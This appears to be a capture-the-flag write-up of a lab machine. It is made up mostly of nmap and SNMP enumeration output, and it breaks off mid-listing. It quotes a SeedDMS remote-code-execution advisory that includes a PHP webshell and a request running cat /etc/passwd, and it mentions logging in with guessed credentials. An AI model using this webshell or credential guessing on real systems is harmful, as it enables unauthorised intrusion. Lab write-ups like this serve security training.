Enum

NMAP

# Nmap 7.80 scan initiated Mon May 17 03:43:06 2021 as: nmap -sCV -p- -oN nmap 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.041s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.80%T=SSL%I=7%D=5/17%Time=60A21F7C%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
SF:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DN
SF:S-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Cont
SF:ent-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-o
SF:rigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20
SF:<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=utf
SF:-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x
SF:20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDi
SF:splay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-height:\x201\.6666666
SF:7;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#
SF:f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\
SF:x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\
SF:x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-w
SF:eight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20mar
SF:gin:\x200\x200\x2010p")%r(HTTPOptions,E70,"HTTP/1\.1\x20400\x20Bad\x20r
SF:equest\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-Encod
SF:ing:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x
SF:20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\nCross-Origin-Res
SF:ource-Policy:\x20same-origin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"te
SF:xt/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x
SF:20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fon
SF:t-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20A
SF:rial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20lin
SF:e-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 17 03:49:12 2021 -- 1 IP address (1 host up) scanned in 366.86 seconds

UDP

Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-18 03:16 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.041s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE
161/udp open  snmp

Nmap done: 1 IP address (1 host up) scanned in 1094.54 seconds

Port 80

Visiting the page shows nginx RHEL start page.

From the SNMP enum we got information about another directory path. We can visit http://dms-pit.htb/seeddms51x/seeddms/

Googling after default credentials shows admin:admin. These do not work however. If we try with michelle:michelle we are granted access.

There is a post which mentions that the version has been upgraded to 5.1.15 which there is a RCE vuln for.

┌──(bob㉿kali)-[~/htb/pit/snmp]
└─$ searchsploit seeddms                                                                                                                                          130 ⨯
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
SeedDMS 5.1.18 - Persistent Cross-Site Scripting                                                                                      | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting                                                                            | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting                                                                              | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution                                                                                  | php/webapps/47022.txt
------------------------------

From the exploit

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code: 
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

Port 161

In order to convert the MIBS output that is generated when poking at SNMP we need to instal an additional package.

sudo apt install snmp-mibs-downloader -> Needed in order to convert MIBS to human readable. Then comment out mibs: in /etc/snmp/snmp.conf

# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
#mibs :

[...]

snmpwalk -c public -v2c 10.10.10.241 .1

SNMPv2-MIB::sysDescr.0 = STRING: Linux pit.htb 4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (8368749) 23:14:47.49
SNMPv2-MIB::sysContact.0 = STRING: Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
SNMPv2-MIB::sysName.0 = STRING: pit.htb
SNMPv2-MIB::sysLocation.0 = STRING: Unknown (edit /etc/snmp/snmpd.conf)
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
SNMPv2-MIB::sysORID.7 = OID: IP-MIB::ip
SNMPv2-MIB::sysORID.8 = OID: UDP-MIB::udpMIB
SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing IP and ICMP implementations
SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing UDP implementations
SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
SNMPv2-MIB::sysORUpTime.1 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.2 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.3 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.4 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.5 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.6 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.7 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.8 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.9 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.10 = Timeticks: (1) 0:00:00.01
HOST-RESOURCES-MIB::hrSystemUptime.0 = Timeticks: (8371797) 23:15:17.97
HOST-RESOURCES-MIB::hrSWRunIndex.1 = INTEGER: 1
HOST-RESOURCES-MIB::hrSWRunIndex.2 = INTEGER: 2
HOST-RESOURCES-MIB::hrSWRunIndex.3 = INTEGER: 3
HOST-RESOURCES-MIB::hrSWRunIndex.4 = INTEGER: 4
HOST-RESOURCES-MIB::hrSWRunIndex.6 = INTEGER: 6
HOST-RESOURCES-MIB::hrSWRunIndex.9 = INTEGER: 9
HOST-RESOURCES-MIB::hrSWRunIndex.10 = INTEGER: 10
HOST-RESOURCES-MIB::hrSWRunIndex.11 = INTEGER: 11
HOST-RESOURCES-MIB::hrSWRunIndex.12 = INTEGER: 12
HOST-RESOURCES-MIB::hrSWRunIndex.13 = INTEGER: 13
HOST-RESOURCES-MIB::hrSWRunIndex.14 = INTEGER: 14
HOST-RESOURCES-MIB::hrSWRunIndex.15 = INTEGER: 15

<SNIP>

UCD-SNMP-MIB::dskPath.1 = STRING: /
UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
UCD-SNMP-MIB::dskDevice.1 = STRING: /dev/mapper/cl-root
UCD-SNMP-MIB::dskDevice.2 = STRING: /dev/mapper/cl-seeddms
UCD-SNMP-MIB::dskMinimum.1 = INTEGER: 10000
UCD-SNMP-MIB::dskMinimum.2 = INTEGER: 100000
UCD-SNMP-MIB::dskMinPercent.1 = INTEGER: -1
UCD-SNMP-MIB::dskMinPercent.2 = INTEGER: -1
UCD-SNMP-MIB::dskTotal.1 = INTEGER: 2611200
UCD-SNMP-MIB::dskTotal.2 = INTEGER: 125600
UCD-SNMP-MIB::dskAvail.1 = INTEGER: 347356
UCD-SNMP-MIB::dskAvail.2 = INTEGER: 75496
UCD-SNMP-MIB::dskUsed.1 = INTEGER: 2263844
UCD-SNMP-MIB::dskUsed.2 = INTEGER: 50104
UCD-SNMP-MIB::dskPercent.1 = INTEGER: 87
UCD-SNMP-MIB::dskPercent.2 = INTEGER: 40
UCD-SNMP-MIB::dskPercentNode.1 = INTEGER: 7
UCD-SNMP-MIB::dskPercentNode.2 = INTEGER: 4
UCD-SNMP-MIB::dskTotalLow.1 = Gauge32: 2611200
UCD-SNMP-MIB::dskTotalLow.2 = Gauge32: 125600
UCD-SNMP-MIB::dskTotalHigh.1 = Gauge32: 0
UCD-SNMP-MIB::dskTotalHigh.2 = Gauge32: 0
UCD-SNMP-MIB::dskAvailLow.1 = Gauge32: 347356
UCD-SNMP-MIB::dskAvailLow.2 = Gauge32: 75496
UCD-SNMP-MIB::dskAvailHigh.1 = Gauge32: 0
UCD-SNMP-MIB::dskAvailHigh.2 = Gauge32: 0
UCD-SNMP-MIB::dskUsedLow.1 = Gauge32: 2263844
UCD-SNMP-MIB::dskUsedLow.2 = Gauge32: 50104
UCD-SNMP-MIB::dskUsedHigh.1 = Gauge32: 0
UCD-SNMP-MIB::dskUsedHigh.2 = Gauge32: 0
UCD-SNMP-MIB::dskErrorFlag.1 = INTEGER: noError(0)
UCD-SNMP-MIB::dskErrorFlag.2 = INTEGER: error(1)
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."monitoring" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."monitoring" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."monitoring" = STRING: Memory usage

Trying https://github.com/dheiland-r7/snmp

./snmpbw.pl 10.10.10.241 public 2 4

.1.3.6.1.2.1.1.1.0 = STRING: Linux pit.htb 4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64
.1.3.6.1.2.1.1.2.0 = OID: .1.3.6.1.4.1.8072.3.2.10
.1.3.6.1.2.1.1.3.0 = Timeticks: (16564064) 1 day, 22:00:40.64
.1.3.6.1.2.1.1.4.0 = STRING: Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
.1.3.6.1.2.1.1.5.0 = STRING: pit.htb
.1.3.6.1.2.1.1.6.0 = STRING: Unknown (edit /etc/snmp/snmpd.conf)
.1.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.2.1 = OID: .1.3.6.1.6.3.10.3.1.1
.1.3.6.1.2.1.1.9.1.2.2 = OID: .1.3.6.1.6.3.11.3.1.1
.1.3.6.1.2.1.1.9.1.2.3 = OID: .1.3.6.1.6.3.15.2.1.1
.1.3.6.1.2.1.1.9.1.2.4 = OID: .1.3.6.1.6.3.1
.1.3.6.1.2.1.1.9.1.2.5 = OID: .1.3.6.1.6.3.16.2.2.1
.1.3.6.1.2.1.1.9.1.2.6 = OID: .1.3.6.1.2.1.49
.1.3.6.1.2.1.1.9.1.2.7 = OID: .1.3.6.1.2.1.4
.1.3.6.1.2.1.1.9.1.2.8 = OID: .1.3.6.1.2.1.50
.1.3.6.1.2.1.1.9.1.2.9 = OID: .1.3.6.1.6.3.13.3.1.3
.1.3.6.1.2.1.1.9.1.2.10 = OID: .1.3.6.1.2.1.92
.1.3.6.1.2.1.1.9.1.3.1 = STRING: The SNMP Management Architecture MIB.
.1.3.6.1.2.1.1.9.1.3.2 = STRING: The MIB for Message Processing and Dispatching.
.1.3.6.1.2.1.1.9.1.3.3 = STRING: The management information definitions for the SNMP User-based Security Model.
.1.3.6.1.2.1.1.9.1.3.4 = STRING: The MIB module for SNMPv2 entities
.1.3.6.1.2.1.1.9.1.3.5 = STRING: View-based Access Control Model for SNMP.
.1.3.6.1.2.1.1.9.1.3.6 = STRING: The MIB module for managing TCP implementations
.1.3.6.1.2.1.1.9.1.3.7 = STRING: The MIB module for managing IP and ICMP implementations
.1.3.6.1.2.1.1.9.1.3.8 = STRING: The MIB module for managing UDP implementations
.1.3.6.1.2.1.1.9.1.3.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
.1.3.6.1.2.1.1.9.1.3.10 = STRING: The MIB module for logging SNMP Notifications.
.1.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.25.1.1.0 = Timeticks: (16566976) 1 day, 22:01:09.76
.1.3.6.1.2.1.25.4.2.1.1.1 = INTEGER: 1
.1.3.6.1.2.1.25.4.2.1.1.2 = INTEGER: 2

[...]

.1.3.6.1.2.1.25.4.2.1.1.25361 = INTEGER: 25361
.1.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
.1.3.6.1.2.1.25.4.2.1.2.2 = STRING: "kthreadd"
.1.3.6.1.2.1.25.4.2.1.2.3 = STRING: "rcu_gp"
.1.3.6.1.2.1.25.4.2.1.2.4 = STRING: "rcu_par_gp"
.1.3.6.1.2.1.25.4.2.1.2.6 = STRING: "kworker/0:0H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.9 = STRING: "mm_percpu_wq"
.1.3.6.1.2.1.25.4.2.1.2.10 = STRING: "ksoftirqd/0"
.1.3.6.1.2.1.25.4.2.1.2.11 = STRING: "rcu_sched"
.1.3.6.1.2.1.25.4.2.1.2.12 = STRING: "migration/0"
.1.3.6.1.2.1.25.4.2.1.2.13 = STRING: "watchdog/0"
.1.3.6.1.2.1.25.4.2.1.2.14 = STRING: "cpuhp/0"
.1.3.6.1.2.1.25.4.2.1.2.15 = STRING: "cpuhp/1"
.1.3.6.1.2.1.25.4.2.1.2.16 = STRING: "watchdog/1"
.1.3.6.1.2.1.25.4.2.1.2.17 = STRING: "migration/1"
.1.3.6.1.2.1.25.4.2.1.2.18 = STRING: "ksoftirqd/1"
.1.3.6.1.2.1.25.4.2.1.2.20 = STRING: "kworker/1:0H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.23 = STRING: "kdevtmpfs"
.1.3.6.1.2.1.25.4.2.1.2.24 = STRING: "netns"
.1.3.6.1.2.1.25.4.2.1.2.25 = STRING: "kauditd"
.1.3.6.1.2.1.25.4.2.1.2.26 = STRING: "khungtaskd"
.1.3.6.1.2.1.25.4.2.1.2.27 = STRING: "oom_reaper"
.1.3.6.1.2.1.25.4.2.1.2.28 = STRING: "writeback"
.1.3.6.1.2.1.25.4.2.1.2.29 = STRING: "kcompactd0"
.1.3.6.1.2.1.25.4.2.1.2.30 = STRING: "ksmd"
.1.3.6.1.2.1.25.4.2.1.2.31 = STRING: "khugepaged"
.1.3.6.1.2.1.25.4.2.1.2.32 = STRING: "crypto"
.1.3.6.1.2.1.25.4.2.1.2.33 = STRING: "kintegrityd"
.1.3.6.1.2.1.25.4.2.1.2.34 = STRING: "kblockd"
.1.3.6.1.2.1.25.4.2.1.2.35 = STRING: "blkcg_punt_bio"
.1.3.6.1.2.1.25.4.2.1.2.36 = STRING: "tpm_dev_wq"
.1.3.6.1.2.1.25.4.2.1.2.37 = STRING: "md"
.1.3.6.1.2.1.25.4.2.1.2.38 = STRING: "edac-poller"
.1.3.6.1.2.1.25.4.2.1.2.39 = STRING: "watchdogd"
.1.3.6.1.2.1.25.4.2.1.2.40 = STRING: "pm_wq"
.1.3.6.1.2.1.25.4.2.1.2.68 = STRING: "kswapd0"
.1.3.6.1.2.1.25.4.2.1.2.161 = STRING: "kthrotld"
.1.3.6.1.2.1.25.4.2.1.2.162 = STRING: "irq/24-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.163 = STRING: "irq/25-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.164 = STRING: "irq/26-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.165 = STRING: "irq/27-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.166 = STRING: "irq/28-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.167 = STRING: "irq/29-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.168 = STRING: "irq/30-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.169 = STRING: "irq/31-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.170 = STRING: "irq/32-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.171 = STRING: "irq/33-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.172 = STRING: "irq/34-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.173 = STRING: "irq/35-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.174 = STRING: "irq/36-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.175 = STRING: "irq/37-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.176 = STRING: "irq/38-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.177 = STRING: "irq/39-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.178 = STRING: "irq/40-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.179 = STRING: "irq/41-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.180 = STRING: "irq/42-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.181 = STRING: "irq/43-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.182 = STRING: "irq/44-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.183 = STRING: "irq/45-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.184 = STRING: "irq/46-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.185 = STRING: "irq/47-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.186 = STRING: "irq/48-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.187 = STRING: "irq/49-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.188 = STRING: "irq/50-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.189 = STRING: "irq/51-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.190 = STRING: "irq/52-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.191 = STRING: "irq/53-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.192 = STRING: "irq/54-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.193 = STRING: "irq/55-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.194 = STRING: "acpi_thermal_pm"
.1.3.6.1.2.1.25.4.2.1.2.195 = STRING: "kmpath_rdacd"
.1.3.6.1.2.1.25.4.2.1.2.196 = STRING: "kaluad"
.1.3.6.1.2.1.25.4.2.1.2.198 = STRING: "ipv6_addrconf"
.1.3.6.1.2.1.25.4.2.1.2.199 = STRING: "kstrp"
.1.3.6.1.2.1.25.4.2.1.2.518 = STRING: "mpt_poll_0"
.1.3.6.1.2.1.25.4.2.1.2.519 = STRING: "mpt/0"
.1.3.6.1.2.1.25.4.2.1.2.520 = STRING: "ata_sff"
.1.3.6.1.2.1.25.4.2.1.2.527 = STRING: "scsi_eh_0"
.1.3.6.1.2.1.25.4.2.1.2.528 = STRING: "scsi_tmf_0"
.1.3.6.1.2.1.25.4.2.1.2.529 = STRING: "scsi_eh_1"
.1.3.6.1.2.1.25.4.2.1.2.530 = STRING: "scsi_tmf_1"
.1.3.6.1.2.1.25.4.2.1.2.531 = STRING: "scsi_eh_2"
.1.3.6.1.2.1.25.4.2.1.2.532 = STRING: "scsi_eh_3"
.1.3.6.1.2.1.25.4.2.1.2.533 = STRING: "scsi_tmf_2"
.1.3.6.1.2.1.25.4.2.1.2.534 = STRING: "scsi_tmf_3"
.1.3.6.1.2.1.25.4.2.1.2.535 = STRING: "scsi_eh_4"
.1.3.6.1.2.1.25.4.2.1.2.536 = STRING: "scsi_tmf_4"
.1.3.6.1.2.1.25.4.2.1.2.537 = STRING: "scsi_eh_5"
.1.3.6.1.2.1.25.4.2.1.2.538 = STRING: "scsi_tmf_5"
.1.3.6.1.2.1.25.4.2.1.2.539 = STRING: "scsi_eh_6"
.1.3.6.1.2.1.25.4.2.1.2.540 = STRING: "scsi_tmf_6"
.1.3.6.1.2.1.25.4.2.1.2.541 = STRING: "scsi_eh_7"
.1.3.6.1.2.1.25.4.2.1.2.542 = STRING: "scsi_tmf_7"
.1.3.6.1.2.1.25.4.2.1.2.543 = STRING: "scsi_eh_8"
.1.3.6.1.2.1.25.4.2.1.2.544 = STRING: "scsi_tmf_8"
.1.3.6.1.2.1.25.4.2.1.2.545 = STRING: "scsi_eh_9"
.1.3.6.1.2.1.25.4.2.1.2.546 = STRING: "scsi_tmf_9"
.1.3.6.1.2.1.25.4.2.1.2.547 = STRING: "scsi_eh_10"
.1.3.6.1.2.1.25.4.2.1.2.548 = STRING: "scsi_tmf_10"
.1.3.6.1.2.1.25.4.2.1.2.549 = STRING: "scsi_eh_11"
.1.3.6.1.2.1.25.4.2.1.2.550 = STRING: "scsi_tmf_11"
.1.3.6.1.2.1.25.4.2.1.2.551 = STRING: "scsi_eh_12"
.1.3.6.1.2.1.25.4.2.1.2.552 = STRING: "scsi_tmf_12"
.1.3.6.1.2.1.25.4.2.1.2.553 = STRING: "scsi_eh_13"
.1.3.6.1.2.1.25.4.2.1.2.554 = STRING: "scsi_tmf_13"
.1.3.6.1.2.1.25.4.2.1.2.555 = STRING: "scsi_eh_14"
.1.3.6.1.2.1.25.4.2.1.2.556 = STRING: "scsi_tmf_14"
.1.3.6.1.2.1.25.4.2.1.2.557 = STRING: "scsi_eh_15"
.1.3.6.1.2.1.25.4.2.1.2.558 = STRING: "scsi_tmf_15"
.1.3.6.1.2.1.25.4.2.1.2.559 = STRING: "irq/16-vmwgfx"
.1.3.6.1.2.1.25.4.2.1.2.560 = STRING: "scsi_eh_16"
.1.3.6.1.2.1.25.4.2.1.2.561 = STRING: "scsi_tmf_16"
.1.3.6.1.2.1.25.4.2.1.2.562 = STRING: "ttm_swap"
.1.3.6.1.2.1.25.4.2.1.2.563 = STRING: "scsi_eh_17"
.1.3.6.1.2.1.25.4.2.1.2.564 = STRING: "scsi_tmf_17"
